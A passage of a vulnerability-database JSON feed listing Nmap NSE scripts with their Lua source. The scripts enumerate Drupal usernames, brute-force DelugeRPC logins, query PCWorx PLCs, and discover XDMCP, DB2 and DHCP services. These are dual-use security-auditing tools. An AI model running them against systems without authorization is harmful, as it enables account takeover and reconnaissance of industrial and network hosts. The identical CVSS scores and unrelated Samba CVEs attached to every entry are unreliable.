Drupal's most popular module.\n\nRequests to admin/views/ajax/autocomplete/user/STRING return all usernames that\nbegin with STRING. The script works by iterating STRING over letters to extract\nall usernames.\n\nFor more information,see:\n* http://www.madirish.net/node/465\n]]\n\n---\n-- @see http-vuln-cve2014-3704.nse\n--\n-- @usage\n-- nmap --script=http-drupal-enum-users --script-args http-drupal-enum-users.root=\"/path/\" <targets>\n--\n-- @output\n-- PORT STATE SERVICE REASON\n-- 80/tcp open http syn-ack\n-- | http-drupal-enum-users:\n-- | admin\n-- | alex\n-- | manager\n-- |_ user\n--\n-- @args http-drupal-enum-users.root base path. Defaults to \"/\"\n\nauthor = \"Hani Benhabiles\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"intrusive\"}\n\n\nportrule = shortport.http\n\naction = function(host, port)\n local root = stdnse.get_script_args(SCRIPT_NAME .. \".root\") or \"/\"\n local character, allrequests,user\n local result = {}\n\n -- ensure that root ends with a trailing slash\n if ( not(root:match(\".*/$\")) ) then\n root = root .. \"/\"\n end\n\n -- characters that usernames may begin with\n -- + is space in url\n local characters = \"abcdefghijklmnopqrstuvwxyz.-123456789+\"\n\n for character in characters:gmatch(\".\") do\n -- add request to pipeline\n allrequests = http.pipeline_add(root.. 'admin/views/ajax/autocomplete/user/' .. 
character, nil, allrequests, \"GET\")\n end\n\n -- send requests\n local pipeline_responses = http.pipeline_go(host, port, allrequests)\n if not pipeline_responses then\n stdnse.debug1(\"No answers from pipelined requests\")\n return nil\n end\n\n for i, response in pairs(pipeline_responses) do\n if response.status == 200 then\n local status, info = json.parse(response.body)\n if status then\n for _,user in pairs(info) do\n if user ~= \"Anonymous\" then\n table.insert(result, user)\n end\n end\n end\n end\n end\n return stdnse.format_output(true, result)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:32:16", "description": "Requests an XDMCP (X display manager control protocol) session and lists supported authentication and authorization mechanisms.\n\n## Example Usage \n \n \n nmap -sU -p 177 --script xdmcp-discover <ip>\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 177/udp open|filtered xdmcp\n | xdmcp-discover:\n | Session id: 0x0000703E\n | Authorization name: MIT-MAGIC-COOKIE-1\n |_ Authorization data: c282137c9bf8e2af88879e6eaa922326\n \n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n * [xdmcp](<../lib/xdmcp.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-01-26T19:35:19", "type": "nmap", "title": "xdmcp-discover NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": 
false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:XDMCP-DISCOVER.NSE", "href": "https://nmap.org/nsedoc/scripts/xdmcp-discover.html", "sourceData": "local nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\nlocal xdmcp = require \"xdmcp\"\n\ndescription = [[\nRequests an XDMCP (X display manager control protocol) session and lists supported authentication and authorization mechanisms.\n]]\n\n---\n-- @usage\n-- nmap -sU -p 177 --script xdmcp-discover <ip>\n--\n-- @output\n-- PORT STATE SERVICE\n-- 177/udp open|filtered xdmcp\n-- | xdmcp-discover:\n-- | Session id: 0x0000703E\n-- | Authorization name: MIT-MAGIC-COOKIE-1\n-- |_ Authorization data: c282137c9bf8e2af88879e6eaa922326\n--\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"safe\", \"discovery\"}\n\n\nportrule = shortport.port_or_service(177, \"xdmcp\", \"udp\")\n\nlocal mutex = nmap.mutex(\"xdmcp-discover\")\nlocal function fail(err) return stdnse.format_output(false, err) end\n\n\naction = function(host, port)\n\n local DISPLAY_ID = 1\n local result = {}\n\n local helper = xdmcp.Helper:new(host, port)\n local status = helper:connect()\n if ( not(status) ) then\n return fail(\"Failed to connect to server\")\n end\n\n local status, response = helper:createSession(nil,\n {\"MIT-MAGIC-COOKIE-1\", \"XDM-AUTHORIZATION-1\"}, DISPLAY_ID)\n\n if ( not(status) ) then\n return fail(\"Failed to create xdmcp session\")\n end\n\n table.insert(result, (\"Session id: 
0x%.8X\"):format(response.session_id))\n if ( response.auth_name and 0 < #response.auth_name ) then\n table.insert(result, (\"Authentication name: %s\"):format(response.auth_name))\n end\n if ( response.auth_data and 0 < #response.auth_data ) then\n table.insert(result, (\"Authentication data: %s\"):format(stdnse.tohex(response.auth_data)))\n end\n if ( response.authr_name and 0 < #response.authr_name ) then\n table.insert(result, (\"Authorization name: %s\"):format(response.authr_name))\n end\n if ( response.authr_data and 0 < #response.authr_data ) then\n table.insert(result, (\"Authorization data: %s\"):format(stdnse.tohex(response.authr_data)))\n end\n return stdnse.format_output(true, result)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:46:07", "description": "Performs brute force password auditing against the DelugeRPC daemon.\n\n## Script Arguments \n\n#### passdb, unpwdb.passlimit, unpwdb.timelimit, unpwdb.userlimit, userdb \n\nSee the documentation for the [unpwdb](<../lib/unpwdb.html#script-args>) library. \n\n#### creds.[service], creds.global \n\nSee the documentation for the [creds](<../lib/creds.html#script-args>) library. \n\n#### brute.credfile, brute.delay, brute.emptypass, brute.firstonly, brute.guesses, brute.mode, brute.passonly, brute.retries, brute.start, brute.threads, brute.unique, brute.useraspass \n\nSee the documentation for the [brute](<../lib/brute.html#script-args>) library. 
\n\n## Example Usage \n \n \n nmap --script deluge-rpc-brute -p 58846 <host>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON TTL\n 58846/tcp open unknown syn-ack 0\n | deluge-rpc-brute:\n | Accounts\n | admin:default - Valid credentials\n | Statistics\n |_ Performed 8 guesses in 1 seconds, average tps: 8\n\n## Requires \n\n * [brute](<../lib/brute.html>)\n * [creds](<../lib/creds.html>)\n * [shortport](<../lib/shortport.html>)\n * [string](<>)\n * [zlib](<../lib/zlib.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-09-18T17:10:59", "type": "nmap", "title": "deluge-rpc-brute NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2020-07-20T20:58:30", "id": "NMAP:DELUGE-RPC-BRUTE.NSE", "href": "https://nmap.org/nsedoc/scripts/deluge-rpc-brute.html", "sourceData": "local brute = require \"brute\"\nlocal creds = require \"creds\"\nlocal shortport = require \"shortport\"\nlocal string = require \"string\"\n\nlocal have_zlib, zlib = pcall(require, \"zlib\")\n\ndescription = [[\nPerforms brute force password auditing against the DelugeRPC 
daemon.\n]]\n\n---\n-- @usage\n-- nmap --script deluge-rpc-brute -p 58846 <host>\n--\n-- @output\n-- PORT STATE SERVICE REASON TTL\n-- 58846/tcp open unknown syn-ack 0\n-- | deluge-rpc-brute:\n-- | Accounts\n-- | admin:default - Valid credentials\n-- | Statistics\n-- |_ Performed 8 guesses in 1 seconds, average tps: 8\n\nauthor = \"Claudiu Perta <claudiu.perta@gmail.com>\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"intrusive\", \"brute\"}\n\nportrule = shortport.port_or_service(58846, \"deluge-rpc\")\n\n-- Returns an rencoded login request with the given username and password.\n-- The format of the login command is the following:\n--\n-- ((0, 'daemon.login', ('username', 'password'), {}),)\n--\n-- This is inspired from deluge source code, in particular, see\n-- http://git.deluge-torrent.org/deluge/tree/deluge/rencode.py\nlocal rencoded_login_request = function(username, password)\n local INT_POS_FIXED_START = 0\n local INT_POS_FIXED_COUNT = 44\n\n -- Dictionaries with length embedded in typecode.\n local DICT_FIXED_START = 102\n local DICT_FIXED_COUNT = 25\n\n -- Strings with length embedded in typecode.\n local STR_FIXED_START = 128\n local STR_FIXED_COUNT = 64\n\n -- Lists with length embedded in typecode.\n local LIST_FIXED_START = 192\n local LIST_FIXED_COUNT = 64\n\n if #username > 0xff - STR_FIXED_START then\n return nil, \"Username too long\"\n elseif #password > 0xff - STR_FIXED_START then\n return nil, \"Password too long\"\n end\n\n -- Encode the login request:\n -- ((0, 'daemon.login', ('username', 'password'), {}),)\n local request = string.pack(\"BBBB\",\n LIST_FIXED_START + 1,\n LIST_FIXED_START + 4,\n INT_POS_FIXED_START,\n STR_FIXED_START + string.len(\"daemon.login\")\n )\n .. \"daemon.login\"\n .. string.pack(\"BB\",\n LIST_FIXED_START + 2,\n STR_FIXED_START + string.len(username)\n )\n .. username\n .. string.pack(\"B\",\n STR_FIXED_START + string.len(password)\n )\n .. password\n .. 
string.pack(\"B\", DICT_FIXED_START)\n\n return request\nend\n\nDriver = {\n\n new = function(self, host, port, invalid_users)\n local o = {}\n setmetatable(o, self)\n self.__index = self\n o.host = host\n o.port = port\n o.invalid_users = invalid_users\n return o\n end,\n\n connect = function(self)\n local status, err\n self.socket = brute.new_socket()\n self.socket:set_timeout(\n ((self.host.times and self.host.times.timeout) or 8) * 1000)\n\n local status, err = self.socket:connect(self.host, self.port, \"ssl\")\n if not status then\n return false, brute.Error:new(\"Failed to connect to server\")\n end\n\n return true\n end,\n\n disconnect = function(self)\n self.socket:close()\n end,\n\n login = function(self, username, password)\n if (self.invalid_users[username]) then\n return false, brute.Error:new(\"Invalid user\")\n end\n\n local request, err = rencoded_login_request(username, password)\n if not request then\n return false, brute.Error:new(err)\n end\n local status, err = self.socket:send(zlib.compress(request))\n\n if not status then\n return false, brute.Error:new(\"Login error\")\n end\n\n local status, response = self.socket:receive()\n if not status then\n\n return false, brute.Error:new(\"Login error\")\n end\n\n response = zlib.decompress(response)\n if response:match(\"BadLoginError\") then\n local error_message = \"Login error\"\n if response:match(\"Username does not exist\") then\n self.invalid_users[username] = true\n error_message = \"Username not found\"\n elseif response:match(\"Password does not match\") then\n error_message = \"Username not found\"\n end\n return false, brute.Error:new(error_message)\n end\n\n return true, creds.Account:new(username, password, creds.State.VALID)\n end,\n\n check = function(self)\n return true\n end\n}\n\naction = function(host, port)\n\n if not have_zlib then\n return \"Error: zlib required!\"\n end\n\n local invalid_users = {}\n local engine = brute.Engine:new(Driver, host, port, invalid_users)\n\n 
engine.options.script_name = SCRIPT_NAME\n local status, results = engine:start()\n\n return results\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:39:34", "description": "This NSE script will query and parse pcworx protocol to a remote PLC. The script will send a initial request packets and once a response is received, it validates that it was a proper response to the command that was sent, and then will parse out the data. PCWorx is a protocol and Program by Phoenix Contact. \n\n<http://digitalbond.com>\n\n## Example Usage \n \n \n nmap --script pcworx-info -p 1962 <host>\n \n \n\n## Script Output \n \n \n | pcworx-info:\n | PLC Type: ILC 330 ETH\n | Model Number: 2737193\n | Firmware Version: 3.95T\n | Firmware Date: Mar 2 2012\n |_ Firmware Time: 09:39:02\n\n## Requires \n\n * [string](<>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-09-06T04:27:47", "type": "nmap", "title": "pcworx-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": 
false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2017-01-14T15:30:31", "id": "NMAP:PCWORX-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/pcworx-info.html", "sourceData": "local string = require \"string\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\n\ndescription = [[\nThis NSE script will query and parse pcworx protocol to a remote PLC.\nThe script will send a initial request packets and once a response is received,\nit validates that it was a proper response to the command that was sent, and then\nwill parse out the data. PCWorx is a protocol and Program by Phoenix Contact.\n\n\nhttp://digitalbond.com\n]]\n---\n-- @usage\n-- nmap --script pcworx-info -p 1962 <host>\n--\n--\n-- @output\n--| pcworx-info:\n--| PLC Type: ILC 330 ETH\n--| Model Number: 2737193\n--| Firmware Version: 3.95T\n--| Firmware Date: Mar 2 2012\n--|_ Firmware Time: 09:39:02\n\n--\n--\n-- @xmloutput\n--<elem key=\"PLC Type\">ILC 330 ETH</elem>\n--<elem key=\"Model Number\">2737193</elem>\n--<elem key=\"Firmware Version\">3.95T</elem>\n--<elem key=\"Firmware Date\">Mar 2 2012</elem>\n--<elem key=\"Firmware Time\">09:39:02</elem>\n\nauthor = \"Stephen Hilt (Digital Bond)\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\"}\n\nportrule = shortport.port_or_service(1962, \"pcworx\", \"tcp\")\n\n-- Safely extract a zero-terminated string if the blob is long enough\n-- Returns nil if it is not.\nlocal function get_string(blob, offset)\n if #blob >= offset then\n return string.unpack(\"z\", blob, offset)\n end\nend\n---\n-- Action Function that is used to run the NSE. This function will send the initial query to the\n-- host and port that were passed in via nmap. The initial response is parsed to determine if host\n-- is a pcworx Protocol device. 
If it is then more actions are taken to gather extra information.\n--\n-- @param host Host that was scanned via nmap\n-- @param port port that was scanned via nmap\naction = function(host,port)\n local init_comms = \"\\x01\\x01\\0\\x1a\\0\\0\\0\\0x\\x80\\0\\x03\\0\\x0cIBETH01N0_M\\0\"\n\n -- create table for output\n local output = stdnse.output_table()\n\n -- create new socket\n local socket = nmap.new_socket()\n -- define the catch of the try statement\n local catch = function()\n socket:close()\n end\n local try = nmap.new_try(catch)\n\n try(socket:connect(host, port))\n try(socket:send(init_comms))\n local response = try(socket:receive())\n\n if not response:match(\"^\\x81\") then\n stdnse.debug1(\"Unexpected or unknown PCWorx message.\")\n return nil\n end\n -- pcworx has a session ID that is generated by the PLC\n -- This will pull the SID so we can communicate further to the PLC\n local sid = string.sub(response, 18, 18)\n local init_comms2 = \"\\x01\\x05\\0\\x16\\0\\x01\\0\\0\\x78\\x80\\0\" .. sid .. \"\\0\\0\\0\\x06\\0\\x04\\x02\\x95\\0\\0\"\n try(socket:send(init_comms2))\n -- receive response\n response = try(socket:receive())\n -- TODO: verify this\n\n -- this is the request that will pull all the information from the PLC\n local req_info = \"\\x01\\x06\\0\\x0e\\0\\x02\\0\\0\\0\\0\\0\" .. sid .. 
\"\\x04\\0\"\n try(socket:send(req_info))\n -- receive response\n response = try(socket:receive())\n\n -- if the response starts with 0x81 then we will continue\n if not response:match(\"^\\x81\") then\n stdnse.debug1(\"Unexpected or unknown PCWorx message.\")\n socket:close()\n return nil\n end\n\n -- create output table with proper data\n output[\"PLC Type\"] = get_string(response, 31)\n output[\"Model Number\"] = get_string(response, 153)\n output[\"Firmware Version\"] = get_string(response, 67)\n output[\"Firmware Date\"] = get_string(response, 80)\n output[\"Firmware Time\"] = get_string(response, 92)\n\n -- close socket and return output table\n socket:close()\n return output\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:47:10", "description": "Attempts to discover DB2 servers on the network by sending a broadcast request to port 523/udp.\n\n## Script Arguments \n\n#### max-newtargets, newtargets \n\nSee the documentation for the [target](<../lib/target.html#script-args>) library. 
\n\n## Example Usage \n \n \n nmap --script db2-discover\n \n\n## Script Output \n \n \n Pre-scan script results:\n | broadcast-db2-discover:\n | 10.0.200.132 (UBU804-DB2E) - IBM DB2 v9.07.0\n |_ 10.0.200.119 (EDUSRV011) - IBM DB2 v9.07.0\n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n * [target](<../lib/target.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-07-10T08:01:26", "type": "nmap", "title": "broadcast-db2-discover NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:BROADCAST-DB2-DISCOVER.NSE", "href": "https://nmap.org/nsedoc/scripts/broadcast-db2-discover.html", "sourceData": "local nmap = require \"nmap\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\nlocal target = require \"target\"\n\ndescription = [[\nAttempts to discover DB2 servers on the network by sending a broadcast request to port 523/udp.\n]]\n\n---\n-- @usage\n-- nmap --script db2-discover\n--\n-- 
@output\n-- Pre-scan script results:\n-- | broadcast-db2-discover:\n-- | 10.0.200.132 (UBU804-DB2E) - IBM DB2 v9.07.0\n-- |_ 10.0.200.119 (EDUSRV011) - IBM DB2 v9.07.0\n\n-- Version 0.1\n-- Created 07/10/2011 - v0.1 - created by Patrik Karlsson <patrik@cqure.net>\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"broadcast\", \"safe\"}\n\n\nprerule = function() return true end\n\n--- Converts the prodrel server string to a version string\n--\n-- @param server_version string containing the product release\n-- @return ver string containing the version information\nlocal function parseVersion( server_version )\n local pfx = string.sub(server_version,1,3)\n\n if pfx == \"SQL\" then\n local major_version = string.sub(server_version,4,5)\n\n -- strip the leading 0 from the major version, for consistency with\n -- nmap-service-probes results\n if string.sub(major_version,1,1) == \"0\" then\n major_version = string.sub(major_version,2)\n end\n local minor_version = string.sub(server_version,6,7)\n local hotfix = string.sub(server_version,8)\n server_version = major_version .. \".\" .. minor_version .. \".\" .. 
hotfix\n else\n return \"Unknown version\"\n end\n\n return (\"IBM DB2 v%s\"):format(server_version)\nend\n\naction = function()\n\n local DB2GETADDR = \"DB2GETADDR\\0SQL09010\\0\"\n local socket = nmap.new_socket(\"udp\")\n local result = {}\n local host, port = \"255.255.255.255\", 523\n\n socket:set_timeout(5000)\n local status = socket:sendto( host, port, DB2GETADDR )\n if ( not(status) ) then return end\n\n while(true) do\n local data\n status, data = socket:receive()\n if( not(status) ) then break end\n\n local version, srvname = data:match(\"DB2RETADDR.(SQL%d+).(.-)\\0\")\n local _, ip\n status, _, _, ip, _ = socket:get_info()\n if ( not(status) ) then return end\n\n if target.ALLOW_NEW_TARGETS then target.add(ip) end\n\n if ( status ) then\n table.insert( result, (\"%s - Host: %s; Version: %s\"):format(ip, srvname, parseVersion( version ) ) )\n end\n end\n socket:close()\n\n return stdnse.format_output( true, result )\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:46:09", "description": "Sends a DHCPINFORM request to a host on UDP port 67 to obtain all the local configuration parameters without allocating a new address. \n\nDHCPINFORM is a DHCP request that returns useful information from a DHCP server, without allocating an IP address. The request sends a list of which fields it wants to know (a handful by default, every field if verbosity is turned on), and the server responds with the fields that were requested. It should be noted that the server doesn't have to return every field, nor does it have to return them in the same order, or honour the request at all. A Linksys WRT54g, for example, completely ignores the list of requested fields and returns a few standard ones. This script displays every field it receives. \n\nWith script arguments, the type of DHCP request can be changed, which can lead to interesting results. 
Additionally, the MAC address can be randomized, which should bypass the DHCP server's client cache and cause it to assign a new IP address. Extra requests can also be sent; with a randomized MAC address each request may consume another lease, which exhausts the server's address pool more quickly, so use this option with care against production servers. \n\nSome of the more useful fields: \n\n * DHCP Server (the address of the server that responded) \n * Subnet Mask \n * Router \n * DNS Servers \n * Hostname\n\n### See also:\n\n * [ broadcast-dhcp6-discover.nse ](<../scripts/broadcast-dhcp6-discover.html>)\n * [ broadcast-dhcp-discover.nse ](<../scripts/broadcast-dhcp-discover.html>)\n\n## Script Arguments \n\n#### dhcp-discover.dhcptype \n\nThe type of DHCP request to make. By default, DHCPINFORM is sent, but this argument can change it to DHCPOFFER, DHCPREQUEST, DHCPDECLINE, DHCPACK, DHCPNAK, DHCPRELEASE or DHCPINFORM. Not all types will evoke a response from all servers, and many require different fields to contain specific values.\n\n#### dhcp-discover.mac \n\nSet to `native` (default), `random`, or a specific client MAC address to use in the DHCP request. Keep in mind that you may not see the response if a non-native address is used. 
Setting it to `random` will possibly cause the DHCP server to reserve a new IP address each time.\n\n#### dhcp-discover.requests \n\nSet to an integer to make up to that many requests (and display the results).\n\n## Example Usage \n \n \n nmap -sU -p 67 --script=dhcp-discover <target>\n\n## Script Output \n \n \n Interesting ports on 192.168.1.1:\n PORT STATE SERVICE\n 67/udp open dhcps\n | dhcp-discover:\n | DHCP Message Type: DHCPACK\n | Server Identifier: 192.168.1.1\n | IP Address Lease Time: 1 day, 0:00:00\n | Subnet Mask: 255.255.255.0\n | Router: 192.168.1.1\n |_ Domain Name Server: 208.81.7.10, 208.81.7.14\n \n\n## Requires \n\n * [dhcp](<../lib/dhcp.html>)\n * [rand](<../lib/rand.html>)\n * [nmap](<../lib/nmap.html>)\n * [outlib](<../lib/outlib.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n * [ipOps](<../lib/ipOps.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2009-09-10T03:26:53", "type": "nmap", "title": "dhcp-discover NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], 
"modified": "2020-01-19T16:37:36", "id": "NMAP:DHCP-DISCOVER.NSE", "href": "https://nmap.org/nsedoc/scripts/dhcp-discover.html", "sourceData": "local dhcp = require \"dhcp\"\nlocal rand = require \"rand\"\nlocal nmap = require \"nmap\"\nlocal outlib = require \"outlib\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\nlocal ipOps = require \"ipOps\"\n\ndescription = [[\nSends a DHCPINFORM request to a host on UDP port 67 to obtain all the local configuration parameters\nwithout allocating a new address.\n\nDHCPINFORM is a DHCP request that returns useful information from a DHCP server, without allocating an IP\naddress. The request sends a list of which fields it wants to know (a handful by default, every field if\nverbosity is turned on), and the server responds with the fields that were requested. It should be noted\nthat the server doesn't have to return every field, nor does it have to return them in the same order,\nor honour the request at all. A Linksys WRT54g, for example, completely ignores the list of requested\nfields and returns a few standard ones. This script displays every field it receives.\n\nWith script arguments, the type of DHCP request can be changed, which can lead to interesting results.\nAdditionally, the MAC address can be randomized, which in should override the cache on the DHCP server and\nassign a new IP address. Extra requests can also be sent to exhaust the IP address range more quickly.\n\nSome of the more useful fields:\n* DHCP Server (the address of the server that responded)\n* Subnet Mask\n* Router\n* DNS Servers\n* Hostname\n]]\n\n---\n-- @see broadcast-dhcp6-discover.nse\n-- @see broadcast-dhcp-discover.nse\n--\n-- @args dhcp-discover.dhcptype The type of DHCP request to make. 
By default,\n-- DHCPINFORM is sent, but this argument can change it to DHCPOFFER,\n-- DHCPREQUEST, DHCPDECLINE, DHCPACK, DHCPNAK, DHCPRELEASE or\n-- DHCPINFORM. Not all types will evoke a response from all servers,\n-- and many require different fields to contain specific values.\n-- @args dhcp-discover.mac Set to <code>native</code> (default) or\n-- <code>random</code> or a specific client MAC address in the DHCP\n-- request. Keep in mind that you may not see the response if\n-- a non-native address is used. Setting it to <code>random</code> will\n-- possibly cause the DHCP server to reserve a new IP address each time.\n-- @args dhcp-discover.requests Set to an integer to make up to that many\n-- requests (and display the results).\n--\n-- @usage\n-- nmap -sU -p 67 --script=dhcp-discover <target>\n-- @output\n-- Interesting ports on 192.168.1.1:\n-- PORT STATE SERVICE\n-- 67/udp open dhcps\n-- | dhcp-discover:\n-- | DHCP Message Type: DHCPACK\n-- | Server Identifier: 192.168.1.1\n-- | IP Address Lease Time: 1 day, 0:00:00\n-- | Subnet Mask: 255.255.255.0\n-- | Router: 192.168.1.1\n-- |_ Domain Name Server: 208.81.7.10, 208.81.7.14\n--\n-- @xmloutput\n-- <elem key=\"DHCP Message Type\">DHCPACK</elem>\n-- <elem key=\"Server Identifier\">192.168.1.1</elem>\n-- <elem key=\"IP Address Lease Time\">1 day, 0:00:00</elem>\n-- <elem key=\"Subnet Mask\">255.255.255.0</elem>\n-- <elem key=\"Router\">192.168.1.1</elem>\n-- <table key=\"Domain Name Server\">\n-- <elem>208.81.7.10</elem>\n-- <elem>208.81.7.14</elem>\n-- </table>\n--\n\n--\n-- 2020-01-14 - Revised by nnposter\n-- o Added script argument \"mac\" to prescribe a specific MAC address\n-- o Deprecated argument \"randomize_mac\" in favor of \"mac=random\"\n--\n-- 2011-12-28 - Revised by Patrik Karlsson <patrik@cqure.net>\n-- o Removed DoS code and placed script into discovery and safe categories\n--\n-- 2011-12-27 - Revised by Patrik Karlsson <patrik@cqure.net>\n-- o Changed script to use DHCPINFORM instead of 
